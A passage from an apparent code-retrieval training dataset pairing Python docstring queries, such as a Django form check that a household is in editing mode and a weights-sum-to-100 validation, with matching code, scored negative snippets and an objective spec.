store_data(self):\n return self._store_data", "def clearRecord(self): \n if self._isinstalled:\n for f in self._table:\n try:\n del self.__dict__[f.name]\n except KeyError:\n pass\n \n for f in self._extra_sql_columns:\n try:\n del self.__dict__[f]\n except KeyError:\n pass\n \n self._original_values.clear()\n self._modified_values.clear()\n self._mtm_referencelist.clear()\n self._child_referencelist.clear()\n self._hasdata = False\n self._ismodified = False\n self._hasdata = False\n self._isnew = False\n self._objectid = None\n self._isinstalled = False\n self._astxt = \"(null)\"", "def finalize(self):\n self.storage.finalize(basket=self)\n self.uncache()\n self._data = None\n self.dirty = False", "def clear_data():\n logger.info(\"Delete Structure instances\")\n Structure.objects.all().delete()\n logger.info(\"Delete StructureType instances\")\n StructureType.objects.all().delete()\n logger.info(\"Delete Industry instances\")\n Industry.objects.all().delete()\n logger.info(\"Delete Price instances\")\n PriceList.objects.all().delete()\n logger.info(\"Delete Stock instances\")\n Stock.objects.all().delete()\n logger.info(\"Delete News instances\")\n News.objects.all().delete()\n logger.info(\"Delete NewsImages instances\")\n NewsImage.objects.all().delete()\n logger.info(\"Delete News Sections instances\")\n NewsCategorySection.objects.all().delete()\n logger.info(\"Delete Analysis instances\")\n AnalysisOpinion.objects.all().delete()\n logger.info(\"Delete Analysis Images instances\")\n AnalysisImage.objects.all().delete()\n logger.info(\"Delete Analysis Sections instances\")\n AnalysisCategorySection.objects.all().delete()", "def reset_the_db(_step):\r\n reset_data(None)", "def delLocalData(self):\n try:\n if len(self.localFilename): os.remove(self.localFilename)\n except Exception as e:\n pass", "def store(self):\n\n pass", "def delete_data(self, name):\n assert name, \"Must input a valid dataset name.\"\n try:\n self.data[\"dataset\"].pop(name)\n self.update_categories()\n self.write_data_cache(self.data)\n except KeyError:\n raise KeyError(\"The dataset \\'{}\\' does not exist in the cache.\".format(name))", "def delete_data(self):\n conn = self._connect_DB()\n cur = conn.cursor()\n cur.execute(\"DELETE FROM movie_table;\")\n self._close_connection(conn)", "def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()", "def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()", "def test_data_object_untrash(self):\n pass", "def delete_plugin_data(self):", "def storage_logic(self):\n if len(self.difference) > 0:\n # Assumes we have comics in the datastore and just want to add more.\n self.store_comics(self.difference)\n elif len(self.urls_from_datastore) == 0:\n # Assumes the datastore is empty.\n self.store_comics(self.urls_from_json)", "def delete(self, data):\r\n pass", "def updateDataStorage(infoToPlot, directory):\n \n \n dataStored=pickle.load(open(os.path.join(directory,'data.pkl'), 'rb'))\n \n for key, value in dataStored.items():\n value += infoToPlot[key]\n infoToPlot[key]=[] \n \n \n with open(os.path.join(directory,'data.pkl'), 'wb') as f:\n pickle.dump(dataStored, f, pickle.HIGHEST_PROTOCOL)", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear_all(self):\n self._data = {}\n self.uncache()\n self.dirty = True\n self.shipping_method = None\n self.payment_method = None\n self.customer_comment = \"\"", "def restore_data(self):\n self.R = self._Ro\n del self._Ro", "def store_and_clear(self, lst, key):\r\n df = pd.DataFrame(lst)\r\n df.set_index(['time'], inplace = True)\r\n with pd.HDFStore(self.STORE) as store:\r\n store.append(key, df)\r\n lst.clear()", "def save(self):\n self.remove()\n self._data.append(self)", "def remove_all_recs(self):\n return self.storage.clear()", "def delete(self):\n first = self.data[0]\n self.data.pop(0)\n self.size = self.size - 1\n return first", "def _save_data(self):\n super()._save_data()\n if self.data:\n # FIXES [BUG-034].\n WeatherForecastObservation.objects.all().delete()\n self.state['inserted_elements'] = len(WeatherForecastObservation.objects.bulk_create(self.data))\n self.logger.info('Successfully saved %d elements.' % self.state['inserted_elements'])\n else:\n self.logger.info('No elements were saved because no elements were available.')\n self.data = None", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear(self):\n self._state[\"data\"].clear()\n self._state[\"session\"].request_rerun()", "def clear():\n global d\n for key in d.keys():\n del d[key]", "def clear(self) -> None:\n self.da = DynamicArray()", "def clear(self):\n self.db_dict.clear()", "def clear(self) -> None:", "def test_data_object_del_all(self):\n pass", "def remove(self, data_id, idx):\n temp = self.database[data_id]\n del temp[idx]\n self.database[data_id] = temp", "def devClearStores(self):\n self._impDataIndex = 0\n self.storeTree = MovieStoreTree()\n self.storeHeap = MovieStoreHeap()\n self.storeHash = MovieStoreHash()\n self.benchmarkDisplay.binarySearchTree.set(0)\n self.benchmarkDisplay.binaryHeap.set(0)\n self.benchmarkDisplay.hashTable.set(0)\n self.benchmarkDisplay.binarySearchTreeDepth.set(0)\n self.benchmarkDisplay.binaryHeapDepth.set(0)", "def clear(self):\n length = len(self.data)\n self.data = [[] for j in range(length)]", "def Update_Saved(self, del_id='0', del_keywords='error'):\n\n self.data = np.load(self.cache_path, allow_pickle=True)[()]\n\n ID = self.data.keys()\n\n for id in ID:\n if not 'valid' in self.data[id]:\n self.data[id]['valid'] = 1\n\n if self.data[id]['valid'] == 0:\n continue\n\n if del_keywords in self.data[id]['post']:\n print(\"delete \" + self.data[id]['link'] + self.data[id]['post'])\n self.data[id]['valid'] = 0\n\n if del_id in ID:\n self.data[del_id]['valid'] = 0\n print(\"delete \" + self.data[del_id]['post'])\n\n np.save(self.cache_path, self.data)", "def data_cleaning():\n conn = get_connect()\n conn.execute(\"DELETE FROM championMatchData WHERE kills < 2 AND deaths < 2 AND assists < 2\")\n conn.commit()\n conn.close()\n return", "def clear_data(self):\n\t\tfor attr in self.coeff_vectors.iterkeys():\n\t\t\tdel self.coeff_vectors[attr][:]\n\t\tself.coeff_vectors.clear()\n\t\tself.coeff_vectors = None", "def reset(self):\n for k in self.data_keys:\n setattr(self, k, [])\n self.size = 0", "def clearData(self):\r\n self.title.setVal(\"\")\r\n self.authorBox.clearData()\r\n self.addPrimeAuthorFn()" ]
[ "0.69582635", "0.67999136", "0.67593694", "0.6599251", "0.6595057", "0.6536432", "0.6519219", "0.649931", "0.64161766", "0.6401068", "0.63972634", "0.6385674", "0.63851345", "0.6344443", "0.6343384", "0.63345444", "0.63222915", "0.63222915", "0.6261738", "0.62559605", "0.6239337", "0.6200578", "0.61816484", "0.61813486", "0.61711234", "0.61448365", "0.6114229", "0.60904866", "0.60830057", "0.60745275", "0.60563624", "0.6047168", "0.60434306", "0.6020696", "0.6012652", "0.6001625", "0.59965587", "0.5967561", "0.59650046", "0.5955149", "0.5951163", "0.59404844", "0.5939103", "0.5896437", "0.58659136", "0.58581436", "0.58546937", "0.5848697", "0.5829881", "0.5814445", "0.57959473", "0.5795469", "0.5779895", "0.57692826", "0.5764682", "0.5763618", "0.5756866", "0.5752387", "0.5750136", "0.5740325", "0.5726243", "0.5725746", "0.57197064", "0.57188463", "0.5715946", "0.5715946", "0.5697721", "0.5696952", "0.56915766", "0.56905895", "0.56892", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.56870353", "0.5685759", "0.5678705", "0.56652325", "0.5663085", "0.56524837", "0.5646392", "0.5644465", "0.5633083", "0.5633083", "0.5633083", "0.5631216", "0.56309503", "0.56250674", "0.5621405", "0.5618578", "0.5593228", "0.5591005", "0.55881375", "0.55871886", "0.55841064", "0.556964", "0.55527717", "0.5547686" ]
0.0
-1
Checks that household is in editing state.
def clean(self): cleaned_data = super().clean() if any(self.errors): # Don't bother validating unless each field is valid on its own return if not self.household.editing: raise forms.ValidationError("Household is not in editing mode.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def can_edit(self):\n return self.state not in (\n 'scanning', 'resulted', 'cancelled', 'aborted')", "def is_edit(self):\n return self._tag == 'edit'", "def _check_is_editable(self, raise_error: bool = True) -> bool:", "def is_editable(self) -> bool | None:\n return self.check_is_editable(raise_error=False)", "def is_editable(self):\n return self.load_model().is_editable_in_committee()", "def is_editable ( self, object ):\n return self.editable", "def is_editable ( self, object ):\n return self.editable", "def IsEditable(self):\r\n\r\n return self._edit", "def can_edit(self):\n return self._can_edit", "def is_editable(self):\n return self.load_model().is_editable_in_dossier()", "def edit_allowed(self):\n account = Account.current_user_account\n if account is None:\n return False\n return self.user_can_edit(account.user)", "def is_editable(obj, request):\n if hasattr(obj, \"is_editable\"):\n return obj.is_editable(request)\n else:\n perm = obj._meta.app_label + \".\" + obj._meta.get_change_permission()\n return request.user.is_authenticated() and request.user.has_perm(perm)", "def user_can_edit(self, user):\n return user == self.owner", "def hasEditVariable(self, variable: Variable, /) -> bool:\n ...", "def _view_is_editable(node):\n return node.tag == 'form' or node.tag == 'tree' and node.get('editable')", "def is_map_editable(self):\n return self.is_editable", "def raise_not_editable(self, viewer):\n if viewer.has_perm(\"bookwyrm.edit_instance_settings\"):\n return\n raise PermissionDenied()", "def testOwnershipAfterEdit(self):\n self.simulateATGUIInteraction(task='edit')\n self.failUnlessEqual(self.person.getOwnerTuple()[1], 'abc123')", "def who_edits(self):\n\t\treturn self.editing", "def _check_is_editable(self, raise_error: bool = True) -> bool:\n try:\n # static analysis: ignore[incompatible_call]\n self._object.mod.update() # type: ignore[call-arg]\n except prawcore.exceptions.Forbidden as error:\n if not raise_error:\n return False\n raise submanager.exceptions.NotAModError(\n self.config,\n message_pre=(\n f\"Account {self.config.context.account!r} must \"\n \"be a moderator to update widgets\"\n ),\n message_post=error,\n ) from error\n\n return True", "def is_people_with_link_can_edit(self):\n return self._tag == 'people_with_link_can_edit'", "def assert_can_edit(selenium, obj, can_edit):\n ui_service = _get_ui_service(selenium, obj=obj)\n info_page = ui_service.open_info_page_of_obj(obj)\n els_shown_for_editor = info_page.els_shown_for_editor()\n assert [item.exists for item in els_shown_for_editor] == \\\n [can_edit] * len(els_shown_for_editor)\n if can_edit:\n _assert_title_editable(obj, selenium, info_page)", "def can_be_edited(self, user):\n return (self.is_public or user == self.owner or\n user in list(self.auth_users.all()))", "def can_edit(self, user):\n return self.author_id == user.id or user.is_staff", "def allow_to_edit(user):\n return allow_to_edit_well(user)", "def is_comment_editable(self, comment_id):\r\n return self._is_element_visible(\"#comment_{} .action-edit\".format(comment_id))", "def check_is_editable(self, raise_error: bool = True) -> bool | None:\n if self._validated is None or (\n self._validated is False and raise_error\n ):\n self.validate(raise_error=raise_error)\n if not self.is_valid:\n return None\n return self._check_is_editable(raise_error=raise_error)", "def dummy():\n\t\t\tself.edit = True", "def isDirty(self):\n return not not ((self.isdirty and self.attendees and\n self.canEditThisEvent()) or self.getPendingEvents())", "def testMemberCanEdit(self):\n self.client.login(username=\"admin\", password=\"test\")\n response = self.client.get(reverse(\"task_detail\", args=[1]))\n self.failUnlessEqual(response.status_code, 200)\n self.failUnless(response.content.find(\"<h2>Edit</h2>\") != -1,\n \"Authenticated users cannot edit tasks.\")\n self.client.logout()", "def testAssistantOwnershipAfterEdit(self):\n self.failUnless(self._testAssistantOwnershipAfter(task='edit'), \"designated assistant is not listed as an owner\")", "def is_auto_editable ( self, object ):\n return self.auto_editable", "def can_edit_user(user):\n\tu = current_user._get_current_object()\n\treturn u==user or u.is_admin()", "def can_edit(self, user):\n if user.has_perm('funding.make_application_decisions'):\n # Funding manager can update things later, if required\n return True\n # Applicants can only edit the application before the final review step\n if self.status in ('S', 'U'):\n if self.applicant == user:\n return True\n return False", "def edit(self,item=None):\r\n raise AbstractError\r\n return False", "def is_item_editor(self,user):\n if user.is_anonymous():\n return False\n if self.group:\n grouptest = user.person == self.group.project_leader or user.person == self.group.editor\n return user.is_staff or user.is_superuser or user.id == self.creator_id", "def canEditThisEvent(self):\n user = self.REQUEST.get('AUTHENTICATED_USER')\n if user is None:\n return 0\n if user.getId() != self.getCalendarUser() and \\\n self.to_date < DateTime():\n return 0\n return user.has_permission('Modify portal content', self)", "def edit(self):\n\n pass", "def field_is_editable(field, node):\n return (\n (not field.readonly or READONLY.search(str(field.states or \"\"))) and\n (node.get('readonly') != \"1\" or READONLY.search(node.get('attrs') or \"\"))\n )", "def can_user_edit(self, user):\n\n return user.is_authenticated and (\n user.has_role('admin') or\n unicode(self.user_id) == user.get_id()\n )", "def unsaved_details_exist(self):\r\n return (self.talkDetailsWidget.saveButton.isEnabled() and\r\n (self.talkDetailsWidget.titleLineEdit.text() or\r\n self.talkDetailsWidget.presenterLineEdit.text() or\r\n self.talkDetailsWidget.categoryLineEdit.text() or\r\n self.talkDetailsWidget.descriptionTextEdit.toPlainText()))", "def OnToggleEdit(self, event):\n\t\ttoggle = self.btn_edit.GetToggle()\n\t\tif not toggle:\n\t\t\tif not util.gAuthen.Authenticate(util.ADMIN):\n\t\t\t\tself.btn_edit.SetToggle(not toggle)\n\t\t\t\treturn \n\t\tself.UpdateToggle()", "def onMouseEdit(self, event):\n\n data = self.app.data\n axes = self.hemisphereMat.figure.axes[0].axes\n\n if not event.inaxes:\n return False\n if event.dblclick:\n return False\n\n if self.ui.checkEditHorizonMask.isChecked():\n suc = self.editHorizonMask(event=event, data=data)\n elif self.ui.checkEditBuildPoints.isChecked():\n suc = self.editBuildPoints(event=event, data=data, axes=axes)\n else:\n return False\n return suc", "def get_editable(self, user):\n if self.doc.get('locked'): return False\n return user.get('role') in ('admin', 'manager', 'engineer')", "def editChange(self,editBtn):\n if self.edit ==True:\n self.updateDetails(\"normal\") #update details column\n self.edit = False #switch boolean\n self.editBtn.setText(\"Edit\") #update button text\n else:\n self.updateDetails(\"edit\") #update details column\n self.edit= True #switch boolean\n self.editBtn.setText(\"Stop Editing\") #update button text", "def get_editable(self, user):\n return user.get('role') == 'admin'", "def canUndo(self):\n return self._index > 0", "def _changeable_fields(self, request, obj):\n return not obj or not self.is_readonly(request, obj)", "def is_anonymous_change(self):\n return self.editor is None", "def edit():", "def start_editing(self):\r\n if self._mode is None:\r\n self._mode = 'edit'\r\n params = {\r\n 'f' : 'json',\r\n 'sessionID' : self._guid\r\n }\r\n url = \"%s/startEditing\" % self._url\r\n res = self._con.post(url, params)\r\n return res['success']\r\n return False", "def checkPermissionEditUsers(self):\n user = self.REQUEST.AUTHENTICATED_USER\n\n return bool(user.has_permission(eionet_edit_users, self))", "def IsEditCancelled(self):\r\n\r\n return self.editCancelled", "def isDraft(self): #$NON-NLS-1$\r", "def IsColumnEditable(self, column):\r\n\r\n return self._header_win.GetColumn(column).IsEditable()", "def can_edit(self, can_edit):\n\n self._can_edit = can_edit", "def is_exp_set(self):\n if self.exp_id is None:\n return False\n if self.working_dir is None:\n return False\n if self.id != str(self.Id_widget.text()).strip():\n return False\n return True", "def is_legal_move(self, house_num):\n return True", "def check_state(self):\n pass", "def check_for_edit(self, force):\n if force:\n self._manipulations = {\"bri\": 0, \"con\": 0, \"sat\": 0}\n return 0\n elif self._manipulations != {\"bri\": 0, \"con\": 0, \"sat\": 0}:\n self._app[\"statusbar\"].message(\n \"Image has been edited, add ! to force\", \"warning\")\n return 1\n return 0", "def soft_assert_role_cannot_be_edited(soft_assert, obj):\n info_widget = factory.get_cls_webui_service(\n objects.get_plural(obj.type))().open_info_page_of_obj(obj)\n role_field_element = info_widget.role_to_edit\n role_field_element.inline_edit.open()\n # wait until new tab contains info page url\n _, new_tab = browsers.get_browser().windows()\n test_utils.wait_for(lambda: new_tab.url.endswith(url.Widget.INFO))\n soft_assert.expect(not role_field_element.add_person_text_field.exists,\n \"There should be no input field.\")", "def is_valid(self):\n return self.eyes[0] and self.eyes[1]", "def editing_mode(self):\n return self.session.editing_mode", "def validarea(state, area):\n if area > len(state) - MEMORY:\n state[HEAD][STATUS] = OOB\n return False\n else:\n return True", "def state_preview_validate(cfg, app, win, events):", "def IsEditCancelled(self):\r\n\r\n return self._editCancelled", "def __lastEditPositionAvailable(self):\n self.gotoLastEditAct.setEnabled(True)", "def test_edit(self):\n r = main.List.connection()\n main.List.add(r, \"ToDo\", 1, \"Buy apples\", 2, \"20.05.2015\")\n main.List.edit(r, \"ToDo\", 1, \"Buy bananas, not apples\", 2, \"20.05.2015\")\n task = main.List.pull_from_redis(r, \"ToDo\", False)\n if task and task is not None:\n check = task[\"1\"][\"description\"] == \"Buy bananas, not apples\"\n self.assertTrue(check, \"Editing failed.\")", "def flags(self, index):\n result = QtGui.QStandardItemModel.flags(self, index)\n return result & ~QtCore.Qt.ItemIsEditable", "def can_undo(self) -> bool:\n\n return self.position > 0", "def get_list_editable(self, request):\n current = self.prescription\n if request.user.has_perm('prescription.can_admin') or self.lock_after == 'never':\n return self.list_editable\n\n if (self.lock_after == 'endorsement' and not current.is_draft) or (self.lock_after == 'closure' and current.is_closed):\n return ('id',)\n else:\n return self.list_editable", "def office_edit_process_view(request):\n authority_required = {'verified_volunteer'} # admin, verified_volunteer\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n office_id = convert_to_int(request.POST.get('office_id', 0))\n office_name = request.POST.get('office_name', False)\n google_civic_office_name = request.POST.get('google_civic_office_name', False)\n google_civic_election_id = request.POST.get('google_civic_election_id', 0)\n primary_party = request.POST.get('primary_party', False)\n state_code = request.POST.get('state_code', False)\n\n election_state = ''\n if state_code is not False:\n election_state = state_code\n elif google_civic_election_id:\n election_manager = ElectionManager()\n results = election_manager.retrieve_election(google_civic_election_id)\n if results['election_found']:\n election = results['election']\n election_state = election.get_election_state()\n\n # Check to see if this office is already in the database\n office_on_stage_found = False\n try:\n office_query = ContestOffice.objects.filter(id=office_id)\n if len(office_query):\n office_on_stage = office_query[0]\n office_on_stage_found = True\n except Exception as e:\n handle_record_not_found_exception(e, logger=logger)\n\n try:\n if office_on_stage_found:\n # Update\n # Removed for now: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and\n if office_name is not False:\n office_on_stage.office_name = office_name\n if google_civic_office_name is not False:\n office_on_stage.google_civic_office_name = google_civic_office_name\n if primary_party is not False:\n office_on_stage.primary_party = primary_party\n if positive_value_exists(election_state):\n office_on_stage.state_code = election_state\n office_on_stage.save()\n office_on_stage_id = office_on_stage.id\n messages.add_message(request, messages.INFO, 'Office updated.')\n google_civic_election_id = office_on_stage.google_civic_election_id\n\n return HttpResponseRedirect(reverse('office:office_summary', args=(office_on_stage_id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id))\n else:\n # Create new\n office_on_stage = ContestOffice(\n office_name=office_name,\n google_civic_election_id=google_civic_election_id,\n state_code=election_state,\n )\n # Removing this limitation: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and\n if primary_party is not False:\n office_on_stage.primary_party = primary_party\n office_on_stage.save()\n messages.add_message(request, messages.INFO, 'New office saved.')\n\n # Come back to the \"Create New Office\" page\n return HttpResponseRedirect(reverse('office:office_new', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id))\n except Exception as e:\n handle_record_not_saved_exception(e, logger=logger)\n messages.add_message(request, messages.ERROR, 'Could not save office.')\n\n return HttpResponseRedirect(reverse('office:office_list', args=()) +\n \"?google_civic_election_id=\" + google_civic_election_id)", "def raise_not_editable(self, viewer):\n if not self.id or viewer.has_perm(\"bookwyrm.create_invites\"):\n return\n raise PermissionDenied()", "def can_edit_profile(user: User, owner: User) -> bool:\n\n return has_permission(user, \"edit_profiles\") or user == owner", "def isowner(self, o):\n return self._owner is o", "def isdirty(self):\n\n return not not self._olddata", "def can_edit_or_403(self, user):\n if self.get_permission_level(user) < self.OWNER_PERMISSION:\n raise PermissionDenied\n return True", "def editInPrimStateLayer(self):\n return self.__EditInLayer(self)", "def can_edit_or_403(self, user):\n if user.id != self.game_master.id:\n raise PermissionDenied\n return True", "def edit(tesserae, tessera_id):\n try:\n return tesserae.edit(tessera_id)\n except TesseraError, e:\n sys.stderr.write(\"Error: %s\\n\", str(e))\n return False", "def edit_object(obj):\n return __EditMode(obj)", "def _authorize_stage_change(user: User, post: Post, new_stage_id: int) -> bool:\n legit_stages = (post.stage.prev_stage_id, post.stage.next_stage_id)\n\n if new_stage_id in legit_stages and post.assignee == user:\n return True\n\n if user.has_perm(\"magplan.edit_extended_post_attrs\"):\n return True\n\n return False", "def is_checkedin(self, guest_name):\n pass", "def has_change_permission(self, request, obj=None):\n has_class_permission = super(EntryAdmin, self).has_change_permission(request, obj)\n if not has_class_permission:\n return False\n if obj is not None and not request.user.is_superuser and request.user.id != obj.author.id:\n return False\n return True", "def test_handle_edit_not_admin(self):\n test_user = User(\"userid\")\n team = Team(\"BRS\", \"brs\", \"brS\")\n self.db.retrieve.return_value = test_user\n self.db.query.return_value = [team]\n with self.app.app_context():\n self.assertTupleEqual(self.testcommand.handle(\"team \"\n \"edit brs\", user),\n (self.testcommand.permission_error, 200))\n self.db.store.assert_not_called()", "def IsColumnEditable(self, column):\r\n\r\n if column < 0 or column >= self.GetColumnCount():\r\n raise Exception(\"Invalid column\")\r\n \r\n return self._columns[column].IsEditable()", "def can_edit(self, user, user_is_admin=False):\r\n if user is None or isinstance(user, FakeAccount):\r\n return False\r\n elif user_is_admin or self.author_id == user._id:\r\n return True\r\n elif Subreddit._by_name('discussion').is_editor(user):\r\n return True\r\n else:\r\n return False", "def allow_edit_by(self, user2_compare):\n if user2_compare.is_superuser:\n return True\n\n if user2_compare == self.user:\n return True\n\n if (self.creator and self.creator == user2_compare) or \\\n (self.owner and self.owner == user2_compare):\n if self.status:\n return True\n\n if user2_compare.has_perm('profiles.change_profile', self):\n return True\n\n return False", "def is_onhold(self) -> bool:", "def edit_button_clicked(self, obj):\n handle = self.get_selected()\n if handle:\n note = self.dbstate.db.get_note_from_handle(handle)\n try:\n from .. import EditNote\n EditNote(self.dbstate, self.uistate, self.track, note,\n callertitle = self.callertitle,\n extratype = [self.notetype] )\n except WindowActiveError:\n pass", "def checkin(self):\n folio = self.folio_id\n if folio.payment_deposits <= 0:\n raise UserError(_(\"\"\"No record of security deposit found on folio {}\n \"\"\".format(folio.name)))\n if folio.state != 'on_queue':\n raise UserError(_(\n 'Folio {} is not yet to be processed'.format(self.folio_id.name)))\n hours, minutes = decimal_to_time(self.env.user.company_id.checkin_hour)\n can_check_in = datetime.combine(\n date.today(), tm(hours, minutes)) < datetime.now()\n if not can_check_in:\n raise UserError(\n 'Guest(s) cannot be checked in earlier than {}'.format(\n self.env.user.company_id.checkin_hour))\n if self.folio_id.room_id.occupy():\n self.folio_id.write({'state': 'checkin'})", "def flags(self, index):\n if not index.isValid():\n return Qt.ItemIsEditable\n return Qt.ItemIsEnabled | Qt.ItemIsEditable", "def __call__(self):\n econtext = get_econtext()\n if econtext is None:\n # tests, probably\n return True\n # kss_inline_editable can be set to false in a template, and this\n # will prohibit inline editing in the page\n kss_inline_editable = econtext.vars.get('kss_inline_editable', None)\n # check the setting in site properties\n context = aq_inner(self.context)\n portal_properties = getToolByName(context, 'portal_properties')\n enable_inline_editing = None\n if getattr(aq_base(portal_properties), 'site_properties', None) is not None:\n site_properties = portal_properties.site_properties\n if getattr(aq_base(site_properties), 'enable_inline_editing', None) is not None:\n enable_inline_editing = site_properties.enable_inline_editing\n # If none of these is set, we enable inline editing. The global\n # site_property may be overwritten by the kss_inline_editable variable\n if kss_inline_editable is None:\n inline_editable = enable_inline_editing\n else:\n inline_editable = kss_inline_editable\n if inline_editable is None:\n inline_editable = True\n # In addition we also check suppress_preview.\n # suppress_preview is set by CMFEditions, when version preview is shown\n # This means inline editing should be disabled globally\n suppress_preview = econtext.vars.get('suppress_preview', False)\n return inline_editable and not suppress_preview", "def edit_draft(self):\r\n EmptyPromise(\r\n lambda: self.q(css='.create-draft').present,\r\n 'Wait for edit draft link to be present'\r\n ).fulfill()\r\n\r\n self.q(css='.create-draft').first.click()\r\n\r\n EmptyPromise(\r\n lambda: self.q(css='.editing-draft-alert').present,\r\n 'Wait for draft mode to be activated'\r\n ).fulfill()", "def isDirty(self):\n\t#@DEBUG christophe have to fix denoising optionnal issue prior to set isDirty() to True\n return False", "def _checkActions(self, editor, setSb=True):\n if editor is not None:\n self.saveAct.setEnabled(editor.isModified())\n self.revertAct.setEnabled(editor.isModified())\n \n self.undoAct.setEnabled(editor.isUndoAvailable())\n self.redoAct.setEnabled(editor.isRedoAvailable())\n self.gotoLastEditAct.setEnabled(\n editor.isLastEditPositionAvailable())\n \n lex = editor.getLexer()\n if lex is not None:\n self.commentAct.setEnabled(lex.canBlockComment())\n self.uncommentAct.setEnabled(lex.canBlockComment())\n self.streamCommentAct.setEnabled(lex.canStreamComment())\n self.boxCommentAct.setEnabled(lex.canBoxComment())\n else:\n self.commentAct.setEnabled(False)\n self.uncommentAct.setEnabled(False)\n self.streamCommentAct.setEnabled(False)\n self.boxCommentAct.setEnabled(False)\n \n if editor.hasBookmarks():\n self.bookmarkNextAct.setEnabled(True)\n self.bookmarkPreviousAct.setEnabled(True)\n self.bookmarkClearAct.setEnabled(True)\n else:\n self.bookmarkNextAct.setEnabled(False)\n self.bookmarkPreviousAct.setEnabled(False)\n self.bookmarkClearAct.setEnabled(False)\n \n if editor.hasSyntaxErrors():\n self.syntaxErrorGotoAct.setEnabled(True)\n self.syntaxErrorClearAct.setEnabled(True)\n else:\n self.syntaxErrorGotoAct.setEnabled(False)\n self.syntaxErrorClearAct.setEnabled(False)\n \n if editor.hasWarnings():\n self.warningsNextAct.setEnabled(True)\n self.warningsPreviousAct.setEnabled(True)\n self.warningsClearAct.setEnabled(True)\n else:\n self.warningsNextAct.setEnabled(False)\n self.warningsPreviousAct.setEnabled(False)\n self.warningsClearAct.setEnabled(False)\n \n if editor.hasCoverageMarkers():\n self.notcoveredNextAct.setEnabled(True)\n self.notcoveredPreviousAct.setEnabled(True)\n else:\n self.notcoveredNextAct.setEnabled(False)\n self.notcoveredPreviousAct.setEnabled(False)\n \n if editor.hasTaskMarkers():\n self.taskNextAct.setEnabled(True)\n self.taskPreviousAct.setEnabled(True)\n else:\n self.taskNextAct.setEnabled(False)\n self.taskPreviousAct.setEnabled(False)\n \n if editor.hasChangeMarkers():\n self.changeNextAct.setEnabled(True)\n self.changePreviousAct.setEnabled(True)\n else:\n self.changeNextAct.setEnabled(False)\n self.changePreviousAct.setEnabled(False)\n \n if editor.canAutoCompleteFromAPIs():\n self.autoCompleteFromAPIsAct.setEnabled(True)\n self.autoCompleteFromAllAct.setEnabled(True)\n else:\n self.autoCompleteFromAPIsAct.setEnabled(False)\n self.autoCompleteFromAllAct.setEnabled(False)\n self.autoCompleteAct.setEnabled(\n editor.canProvideDynamicAutoCompletion())\n self.calltipsAct.setEnabled(editor.canProvideCallTipps())\n self.codeInfoAct.setEnabled(self.__isEditorInfoSupportedEd(editor))\n \n if editor.isPyFile() or editor.isRubyFile():\n self.gotoPreviousDefAct.setEnabled(True)\n self.gotoNextDefAct.setEnabled(True)\n else:\n self.gotoPreviousDefAct.setEnabled(False)\n self.gotoNextDefAct.setEnabled(False)\n \n self.sortAct.setEnabled(editor.selectionIsRectangle())\n enable = editor.hasSelection()\n self.editUpperCaseAct.setEnabled(enable)\n self.editLowerCaseAct.setEnabled(enable)\n \n if setSb:\n line, pos = editor.getCursorPosition()\n enc = editor.getEncoding()\n lang = editor.getLanguage()\n eol = editor.getEolIndicator()\n zoom = editor.getZoom()\n self.__setSbFile(\n editor.getFileName(), line + 1, pos, enc, lang, eol, zoom)\n \n self.checkActions.emit(editor)\n \n saveAllEnable = False\n for editor in self.editors:\n if editor.isModified():\n saveAllEnable = True\n self.saveAllAct.setEnabled(saveAllEnable)", "def editor_is(self, user):\n if not user:\n return False\n if JobPost.query.filter_by(domain=self, user=user).notempty():\n return True\n return False", "def DoEdit(self,event):\r\n raise UncodedError", "def IsReadOnly(self) -> bool:", "def _unfiled_box():\n return db.box((db.box.name == 'Unfiled') & (db.box.owner == auth.user.id))" ]
[ "0.7178205", "0.71516967", "0.7085395", "0.69433004", "0.6895201", "0.68161714", "0.68161714", "0.66513175", "0.6608026", "0.6533432", "0.6527401", "0.6448996", "0.6317548", "0.62204605", "0.6207848", "0.61636037", "0.6070379", "0.6058616", "0.5964224", "0.5950804", "0.59350204", "0.5930872", "0.5927125", "0.5901295", "0.58840525", "0.58791", "0.5828084", "0.5823023", "0.58227617", "0.5807426", "0.5805622", "0.5803488", "0.57960665", "0.5782442", "0.5762461", "0.5754379", "0.5747761", "0.5738128", "0.5730384", "0.56636465", "0.5661355", "0.5634615", "0.5631286", "0.56120324", "0.5610141", "0.5600621", "0.55992484", "0.5566271", "0.5562768", "0.55463374", "0.55456835", "0.5540493", "0.55377424", "0.5520764", "0.5511306", "0.5503428", "0.55031735", "0.54776", "0.5476462", "0.54694265", "0.5451189", "0.5425096", "0.5424951", "0.53701514", "0.53666043", "0.53491604", "0.5343262", "0.53353304", "0.5319322", "0.5311338", "0.5296654", "0.52960175", "0.5290787", "0.52852774", "0.5284959", "0.5280014", "0.52779377", "0.5268375", "0.52600336", "0.52585745", "0.52536154", "0.52493954", "0.5245498", "0.5235622", "0.52342767", "0.52326685", "0.52263784", "0.5219975", "0.52188736", "0.5207022", "0.5201546", "0.5200435", "0.51984024", "0.51904047", "0.5183927", "0.51770276", "0.5176511", "0.51755923", "0.51745677", "0.51430315" ]
0.66041714
9
Checks that total of all weights is 100. Weights may be negative.
def clean(self): if any(self.errors): # Don't bother validating unless each form is valid on its own return if self.get_total_weights() != 100: raise forms.ValidationError("Weights must sum to 100; try normalizing.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
